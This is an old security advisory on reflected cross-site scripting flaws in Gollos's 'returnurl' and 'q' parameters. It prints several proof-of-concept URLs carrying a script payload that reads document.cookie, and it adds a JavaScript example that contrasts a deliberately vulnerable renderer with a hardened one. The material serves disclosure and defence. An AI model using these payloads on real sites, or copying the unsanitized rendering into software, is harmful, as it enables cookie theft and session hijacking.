Cross-site Scripting (XSS) Vulnerabilities in Gollos

2011-02-01T00:00:00
ID HTB22830
Type htbridge
Reporter High-Tech Bridge
Modified 2011-02-01T00:00:00

Description

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Gollos which could be exploited to perform cross-site scripting attacks.

1) Cross-site scripting (XSS) vulnerabilities in Gollos
1.1 The vulnerability exists due to input sanitization errors in the "returnurl" parameter in the register.aspx, publication/info.aspx and user/add.aspx scripts. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.

Exploitation examples:
http://host/?returnurl="><script>alert(document.cookie)</script>
http://host/register.aspx?returnurl="><script>alert(document.cookie)</script>
https://adminhost/publication/info.aspx?pt=1&returnurl="><script>alert(document.cookie)</script>
https://adminhost/user/add.aspx?returnurl="><script>alert(document.cookie)</script>

1.2 The vulnerability exists due to an input sanitization error in the "q" parameter in product/list.aspx. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.
Exploitation example:
http://host/product/list.aspx?q=1"><script>alert(document.cookie)</script>&x=0&y=0
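The following is an added illustration, not code from the advisory or from Gollos, covering both 1.1 (returnurl) and 1.2 (q). The leading `">` in every published payload suggests the parameter is reflected inside a double-quoted HTML attribute (a hidden form field is assumed here; the real Gollos markup is not on this page). The example renders that field unsanitized, as the advisory describes, and then hardened: the value is validated as a site-local path (which also removes the open redirect a free-form returnurl usually carries) and HTML-encoded at the point of output. The helper function names, the form markup and the test inputs are constructed for this example.

```javascript
// Added example (not Gollos code): a page that reflects the "returnurl"
// query parameter into a hidden form field, first as the advisory describes
// it (raw), then hardened. The form markup is an assumption.

// Payload quoted in the advisory. The leading `">` closes the attribute
// value and the <input> tag, so the <script> element lands in the page body.
const PAYLOAD = '"><script>alert(document.cookie)</script>';

// Vulnerable rendering: the raw parameter is interpolated into an attribute
// value, which is the behaviour the advisory reports.
function renderVulnerable(returnurl) {
  return `<form method="post" action="/register.aspx">
<input type="hidden" name="returnurl" value="${returnurl}">
</form>`;
}

// Minimal encoder for HTML text and double-quoted attribute contexts
// (the characters an attribute encoder such as .NET's
// HttpUtility.HtmlEncode takes care of).
function htmlEncode(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Accept only a site-local path as the return target; anything else falls
// back to "/". Rejects "//host" and "/\host" (protocol-relative), absolute
// URLs, control characters, and anything the URL parser resolves off-site.
function safeReturnUrl(returnurl, fallback = '/') {
  const v = returnurl == null ? '' : String(returnurl);
  if (!/^\/(?![\/\\])[^\x00-\x1f\x7f]*$/.test(v)) return fallback;
  let u;
  try {
    u = new URL(v, 'http://localhost');
  } catch (e) {
    return fallback;
  }
  if (u.origin !== 'http://localhost') return fallback;
  return u.pathname + u.search;
}

// Hardened rendering: validate the value, then encode it for the attribute
// context at the moment it is written into the page.
function renderHardened(returnurl) {
  const target = htmlEncode(safeReturnUrl(returnurl));
  return `<form method="post" action="/register.aspx">
<input type="hidden" name="returnurl" value="${target}">
</form>`;
}

// Quick check used when testing a fix: does the rendered page contain a real
// <script> start tag (as opposed to the encoded text "&lt;script&gt;")?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}
```

The same two steps apply to the "q" search parameter in product/list.aspx: a search term has no URL shape to validate, so there the fix is output encoding alone, with `htmlEncode` applied wherever the term is echoed back (attribute value of the search box, or the "results for ..." text).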